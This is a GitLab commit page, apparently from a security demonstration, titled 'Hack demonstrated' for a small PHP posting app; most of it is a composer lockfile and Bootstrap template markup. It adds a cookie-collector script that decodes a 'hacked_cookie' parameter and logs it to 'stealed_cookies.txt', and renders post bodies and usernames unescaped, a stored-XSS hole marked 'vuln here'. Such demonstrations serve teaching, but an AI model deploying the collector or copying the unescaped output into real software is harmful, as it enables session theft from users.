Skip to content
Snippets Groups Projects
Commit 56e2195b authored by Sibidharan's avatar Sibidharan :speech_balloon:
Browse files

Hack demonstrated

parent 65a693e9
Branches master
No related tags found
No related merge requests found
with 503 additions and 141 deletions
No preview for this file type
File added
File added
File added
File added
No preview for this file type
No preview for this file type
"require": {
"nesbot/carbon": "^2.44"
"_readme": [
"This file locks the dependencies of your project to a known state",
"Read more about it at",
"This file is @generated automatically"
"content-hash": "29f9e7ba2fcb313db1900c993906bd33",
"packages": [
"name": "nesbot/carbon",
"version": "2.44.0",
"source": {
"type": "git",
"url": "",
"reference": "e6ef33cb1f67a4bed831ed6d0f7e156739a5d8cd"
"dist": {
"type": "zip",
"url": "",
"reference": "e6ef33cb1f67a4bed831ed6d0f7e156739a5d8cd",
"shasum": ""
"require": {
"ext-json": "*",
"php": "^7.1.8 || ^8.0",
"symfony/polyfill-mbstring": "^1.0",
"symfony/translation": "^3.4 || ^4.0 || ^5.0"
"require-dev": {
"doctrine/orm": "^2.7",
"friendsofphp/php-cs-fixer": "^2.14 || ^3.0",
"kylekatarnls/multi-tester": "^2.0",
"phpmd/phpmd": "^2.9",
"phpstan/extension-installer": "^1.0",
"phpstan/phpstan": "^0.12.54",
"phpunit/phpunit": "^7.5.20 || ^8.5.14",
"squizlabs/php_codesniffer": "^3.4"
"bin": [
"type": "library",
"extra": {
"branch-alias": {
"dev-master": "2.x-dev",
"dev-3.x": "3.x-dev"
"laravel": {
"providers": [
"phpstan": {
"includes": [
"autoload": {
"psr-4": {
"Carbon\\": "src/Carbon/"
"notification-url": "",
"license": [
"authors": [
"name": "Brian Nesbitt",
"email": "",
"homepage": ""
"name": "kylekatarnls",
"homepage": ""
"description": "An API extension for DateTime that supports 281 different languages.",
"homepage": "",
"keywords": [
"support": {
"issues": "",
"source": ""
"funding": [
"url": "",
"type": "open_collective"
"url": "",
"type": "tidelift"
"time": "2021-01-26T20:46:41+00:00"
"name": "symfony/polyfill-mbstring",
"version": "v1.22.0",
"source": {
"type": "git",
"url": "",
"reference": "f377a3dd1fde44d37b9831d68dc8dea3ffd28e13"
"dist": {
"type": "zip",
"url": "",
"reference": "f377a3dd1fde44d37b9831d68dc8dea3ffd28e13",
"shasum": ""
"require": {
"php": ">=7.1"
"suggest": {
"ext-mbstring": "For best performance"
"type": "library",
"extra": {
"branch-alias": {
"dev-main": "1.22-dev"
"thanks": {
"name": "symfony/polyfill",
"url": ""
"autoload": {
"psr-4": {
"Symfony\\Polyfill\\Mbstring\\": ""
"files": [
"notification-url": "",
"license": [
"authors": [
"name": "Nicolas Grekas",
"email": ""
"name": "Symfony Community",
"homepage": ""
"description": "Symfony polyfill for the Mbstring extension",
"homepage": "",
"keywords": [
"support": {
"source": ""
"funding": [
"url": "",
"type": "custom"
"url": "",
"type": "github"
"url": "",
"type": "tidelift"
"time": "2021-01-07T16:49:33+00:00"
"name": "symfony/polyfill-php80",
"version": "v1.22.0",
"source": {
"type": "git",
"url": "",
"reference": "dc3063ba22c2a1fd2f45ed856374d79114998f91"
"dist": {
"type": "zip",
"url": "",
"reference": "dc3063ba22c2a1fd2f45ed856374d79114998f91",
"shasum": ""
"require": {
"php": ">=7.1"
"type": "library",
"extra": {
"branch-alias": {
"dev-main": "1.22-dev"
"thanks": {
"name": "symfony/polyfill",
"url": ""
"autoload": {
"psr-4": {
"Symfony\\Polyfill\\Php80\\": ""
"files": [
"classmap": [
"notification-url": "",
"license": [
"authors": [
"name": "Ion Bazan",
"email": ""
"name": "Nicolas Grekas",
"email": ""
"name": "Symfony Community",
"homepage": ""
"description": "Symfony polyfill backporting some PHP 8.0+ features to lower PHP versions",
"homepage": "",
"keywords": [
"support": {
"source": ""
"funding": [
"url": "",
"type": "custom"
"url": "",
"type": "github"
"url": "",
"type": "tidelift"
"time": "2021-01-07T16:49:33+00:00"
"name": "symfony/translation",
"version": "v5.2.2",
"source": {
"type": "git",
"url": "",
"reference": "c021864d4354ee55160ddcfd31dc477a1bc77949"
"dist": {
"type": "zip",
"url": "",
"reference": "c021864d4354ee55160ddcfd31dc477a1bc77949",
"shasum": ""
"require": {
"php": ">=7.2.5",
"symfony/polyfill-mbstring": "~1.0",
"symfony/polyfill-php80": "^1.15",
"symfony/translation-contracts": "^2.3"
"conflict": {
"symfony/config": "<4.4",
"symfony/dependency-injection": "<5.0",
"symfony/http-kernel": "<5.0",
"symfony/twig-bundle": "<5.0",
"symfony/yaml": "<4.4"
"provide": {
"symfony/translation-implementation": "2.0"
"require-dev": {
"psr/log": "~1.0",
"symfony/config": "^4.4|^5.0",
"symfony/console": "^4.4|^5.0",
"symfony/dependency-injection": "^5.0",
"symfony/finder": "^4.4|^5.0",
"symfony/http-kernel": "^5.0",
"symfony/intl": "^4.4|^5.0",
"symfony/service-contracts": "^1.1.2|^2",
"symfony/yaml": "^4.4|^5.0"
"suggest": {
"psr/log-implementation": "To use logging capability in translator",
"symfony/config": "",
"symfony/yaml": ""
"type": "library",
"autoload": {
"files": [
"psr-4": {
"Symfony\\Component\\Translation\\": ""
"exclude-from-classmap": [
"notification-url": "",
"license": [
"authors": [
"name": "Fabien Potencier",
"email": ""
"name": "Symfony Community",
"homepage": ""
"description": "Provides tools to internationalize your application",
"homepage": "",
"support": {
"source": ""
"funding": [
"url": "",
"type": "custom"
"url": "",
"type": "github"
"url": "",
"type": "tidelift"
"time": "2021-01-27T10:15:41+00:00"
"name": "symfony/translation-contracts",
"version": "v2.3.0",
"source": {
"type": "git",
"url": "",
"reference": "e2eaa60b558f26a4b0354e1bbb25636efaaad105"
"dist": {
"type": "zip",
"url": "",
"reference": "e2eaa60b558f26a4b0354e1bbb25636efaaad105",
"shasum": ""
"require": {
"php": ">=7.2.5"
"suggest": {
"symfony/translation-implementation": ""
"type": "library",
"extra": {
"branch-alias": {
"dev-master": "2.3-dev"
"thanks": {
"name": "symfony/contracts",
"url": ""
"autoload": {
"psr-4": {
"Symfony\\Contracts\\Translation\\": ""
"notification-url": "",
"license": [
"authors": [
"name": "Nicolas Grekas",
"email": ""
"name": "Symfony Community",
"homepage": ""
"description": "Generic abstractions related to translation",
"homepage": "",
"keywords": [
"support": {
"source": ""
"funding": [
"url": "",
"type": "custom"
"url": "",
"type": "github"
"url": "",
"type": "tidelift"
"time": "2020-09-28T13:05:58+00:00"
"packages-dev": [],
"aliases": [],
"minimum-stability": "stable",
"stability-flags": [],
"prefer-stable": false,
"prefer-lowest": false,
"platform": [],
"platform-dev": [],
"plugin-api-version": "2.0.0"
File added
$cookie = base64_decode($_GET['hacked_cookie']);
file_put_contents('stealed_cookies.txt', $cookie."\n", FILE_APPEND | LOCK_EX);
......@@ -2,6 +2,10 @@
include_once 'library/auth.php';
require 'library/user.php';
require 'library/posts.php';
require 'vendor/autoload.php';
use Carbon\Carbon;
if(isset($_COOKIE['username']) and isset($_COOKIE['token'])){
if(!verify_session($_COOKIE['username'], $_COOKIE['token'])){
......@@ -11,6 +15,28 @@ if(isset($_COOKIE['username']) and isset($_COOKIE['token'])){
header("Location: index.php");
if(isset($_POST['body']) and isset($_FILES['image'])){
$target_directory = 'images/';
$image_type = pathinfo(basename($_FILES['image']['name']))['extension'];
$target_file = $target_directory . md5(basename($_FILES['image']['name'])) . '_'.time().'.'.$image_type;
if(strtolower($image_type) == 'jpg' or strtolower($image_type) == "png" or strtolower($image_type) == "jpeg"){
die('File already exists');
} else {
if(move_uploaded_file($_FILES['image']['tmp_name'], $target_file)){
do_post($_POST['body'], $target_file, $_COOKIE['username']); //vuln here
} else {
die('Error uploading file');
} else {
die("Invalid file type");
<!doctype html>
......@@ -82,166 +108,47 @@ if(isset($_COOKIE['username']) and isset($_COOKIE['token'])){
<section class="py-5 text-center container">
<div class="row py-lg-5">
<div class="col-lg-6 col-md-8 mx-auto">
<h1 class="fw-light">Album example</h1>
<p class="lead text-muted">Something short and leading about the collection below—its contents, the creator, etc. Make it short and sweet, but not too short so folks don’t simply skip over it entirely.</p>
<a href="#" class="btn btn-primary my-2">Main call to action</a>
<a href="#" class="btn btn-secondary my-2">Secondary action</a>
<form method="POST" action="home.php?post" enctype="multipart/form-data">
<div class="mb-3">
<textarea class="form-control" id="exampleFormControlTextarea1" rows="3" placeholder="What's on your mind?" name="body"></textarea>
<div class="mb-3">
<input class="form-control" type="file" id="formFile" name="image">
<div class="mb-3">
<input class="btn btn-primary" style="width: 100%" type="submit" value="Post">
<div class="album py-5 bg-light">
<div class="container">
<div class="row row-cols-1 row-cols-sm-2 row-cols-md-3 g-3">
$posts = get_all_posts();
foreach($posts as $post){
$c = Carbon::parse($post['posted_on']);
<div class="col">
<div class="card shadow-sm">
<svg class="bd-placeholder-img card-img-top" width="100%" height="225" xmlns="" role="img" aria-label="Placeholder: Thumbnail" preserveAspectRatio="xMidYMid slice" focusable="false"><title>Placeholder</title><rect width="100%" height="100%" fill="#55595c"/><text x="50%" y="50%" fill="#eceeef" dy=".3em">Thumbnail</text></svg>
<div class="card-body">
<p class="card-text">This is a wider card with supporting text below as a natural lead-in to additional content. This content is a little bit longer.</p>
<div class="d-flex justify-content-between align-items-center">
<div class="btn-group">
<button type="button" class="btn btn-sm btn-outline-secondary">View</button>
<button type="button" class="btn btn-sm btn-outline-secondary">Edit</button>
<small class="text-muted">9 mins</small>
<div class="col">
<div class="card shadow-sm">
<svg class="bd-placeholder-img card-img-top" width="100%" height="225" xmlns="" role="img" aria-label="Placeholder: Thumbnail" preserveAspectRatio="xMidYMid slice" focusable="false"><title>Placeholder</title><rect width="100%" height="100%" fill="#55595c"/><text x="50%" y="50%" fill="#eceeef" dy=".3em">Thumbnail</text></svg>
<div class="card-body">
<p class="card-text">This is a wider card with supporting text below as a natural lead-in to additional content. This content is a little bit longer.</p>
<div class="d-flex justify-content-between align-items-center">
<div class="btn-group">
<button type="button" class="btn btn-sm btn-outline-secondary">View</button>
<button type="button" class="btn btn-sm btn-outline-secondary">Edit</button>
<small class="text-muted">9 mins</small>
<div class="col">
<div class="card shadow-sm">
<svg class="bd-placeholder-img card-img-top" width="100%" height="225" xmlns="" role="img" aria-label="Placeholder: Thumbnail" preserveAspectRatio="xMidYMid slice" focusable="false"><title>Placeholder</title><rect width="100%" height="100%" fill="#55595c"/><text x="50%" y="50%" fill="#eceeef" dy=".3em">Thumbnail</text></svg>
<div class="card-body">
<p class="card-text">This is a wider card with supporting text below as a natural lead-in to additional content. This content is a little bit longer.</p>
<div class="d-flex justify-content-between align-items-center">
<div class="btn-group">
<button type="button" class="btn btn-sm btn-outline-secondary">View</button>
<button type="button" class="btn btn-sm btn-outline-secondary">Edit</button>
<small class="text-muted">9 mins</small>
<div class="col">
<div class="card shadow-sm">
<svg class="bd-placeholder-img card-img-top" width="100%" height="225" xmlns="" role="img" aria-label="Placeholder: Thumbnail" preserveAspectRatio="xMidYMid slice" focusable="false"><title>Placeholder</title><rect width="100%" height="100%" fill="#55595c"/><text x="50%" y="50%" fill="#eceeef" dy=".3em">Thumbnail</text></svg>
<div class="card-body">
<p class="card-text">This is a wider card with supporting text below as a natural lead-in to additional content. This content is a little bit longer.</p>
<div class="d-flex justify-content-between align-items-center">
<div class="btn-group">
<button type="button" class="btn btn-sm btn-outline-secondary">View</button>
<button type="button" class="btn btn-sm btn-outline-secondary">Edit</button>
<small class="text-muted">9 mins</small>
<div class="bd-placeholder-img card-img-top" style="height: 255px; width: 100%; background: url(<?=$post['image']?>); background-position: center; background-size: contain;background-repeat: no-repeat;">
<div class="col">
<div class="card shadow-sm">
<svg class="bd-placeholder-img card-img-top" width="100%" height="225" xmlns="" role="img" aria-label="Placeholder: Thumbnail" preserveAspectRatio="xMidYMid slice" focusable="false"><title>Placeholder</title><rect width="100%" height="100%" fill="#55595c"/><text x="50%" y="50%" fill="#eceeef" dy=".3em">Thumbnail</text></svg>
<div class="card-body">
<p class="card-text">This is a wider card with supporting text below as a natural lead-in to additional content. This content is a little bit longer.</p>
<div class="d-flex justify-content-between align-items-center">
<div class="btn-group">
<button type="button" class="btn btn-sm btn-outline-secondary">View</button>
<button type="button" class="btn btn-sm btn-outline-secondary">Edit</button>
<small class="text-muted">9 mins</small>
<div class="col">
<div class="card shadow-sm">
<svg class="bd-placeholder-img card-img-top" width="100%" height="225" xmlns="" role="img" aria-label="Placeholder: Thumbnail" preserveAspectRatio="xMidYMid slice" focusable="false"><title>Placeholder</title><rect width="100%" height="100%" fill="#55595c"/><text x="50%" y="50%" fill="#eceeef" dy=".3em">Thumbnail</text></svg>
<div class="card-body">
<p class="card-text">This is a wider card with supporting text below as a natural lead-in to additional content. This content is a little bit longer.</p>
<div class="d-flex justify-content-between align-items-center">
<div class="btn-group">
<button type="button" class="btn btn-sm btn-outline-secondary">View</button>
<button type="button" class="btn btn-sm btn-outline-secondary">Edit</button>
<small class="text-muted">9 mins</small>
<div class="col">
<div class="card shadow-sm">
<svg class="bd-placeholder-img card-img-top" width="100%" height="225" xmlns="" role="img" aria-label="Placeholder: Thumbnail" preserveAspectRatio="xMidYMid slice" focusable="false"><title>Placeholder</title><rect width="100%" height="100%" fill="#55595c"/><text x="50%" y="50%" fill="#eceeef" dy=".3em">Thumbnail</text></svg>
<div class="card-body">
<p class="card-text">This is a wider card with supporting text below as a natural lead-in to additional content. This content is a little bit longer.</p>
<div class="d-flex justify-content-between align-items-center">
<div class="btn-group">
<button type="button" class="btn btn-sm btn-outline-secondary">View</button>
<button type="button" class="btn btn-sm btn-outline-secondary">Edit</button>
<small class="text-muted">9 mins</small>
<div class="col">
<div class="card shadow-sm">
<svg class="bd-placeholder-img card-img-top" width="100%" height="225" xmlns="" role="img" aria-label="Placeholder: Thumbnail" preserveAspectRatio="xMidYMid slice" focusable="false"><title>Placeholder</title><rect width="100%" height="100%" fill="#55595c"/><text x="50%" y="50%" fill="#eceeef" dy=".3em">Thumbnail</text></svg>
<div class="card-body">
<p class="card-text">This is a wider card with supporting text below as a natural lead-in to additional content. This content is a little bit longer.</p>
<div class="d-flex justify-content-between align-items-center">
<div class="btn-group">
<button type="button" class="btn btn-sm btn-outline-secondary">View</button>
<button type="button" class="btn btn-sm btn-outline-secondary">Edit</button>
<small class="text-muted">9 mins</small>
<div class="col">
<div class="card shadow-sm">
<svg class="bd-placeholder-img card-img-top" width="100%" height="225" xmlns="" role="img" aria-label="Placeholder: Thumbnail" preserveAspectRatio="xMidYMid slice" focusable="false"><title>Placeholder</title><rect width="100%" height="100%" fill="#55595c"/><text x="50%" y="50%" fill="#eceeef" dy=".3em">Thumbnail</text></svg>
<div class="card-body">
<p class="card-text">This is a wider card with supporting text below as a natural lead-in to additional content. This content is a little bit longer.</p>
<p class="card-text"><?=$post['body']?></p>
<div class="d-flex justify-content-between align-items-center">
<div class="btn-group">
<button type="button" class="btn btn-sm btn-outline-secondary">View</button>
<button type="button" class="btn btn-sm btn-outline-secondary">Edit</button>
<button type="button" class="btn btn-sm btn-outline-secondary"><?=$post['username']?></button>
<button type="button" class="btn btn-sm btn-outline-danger">Delete</button>
<small class="text-muted">9 mins</small>
<small class="text-muted"><?=$c->diffForHumans()?></small>

2.33 MiB


1.25 MiB


1.25 MiB


1.25 MiB


1.25 MiB


81.5 KiB


1.21 MiB


795 KiB

0% Loading or .
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment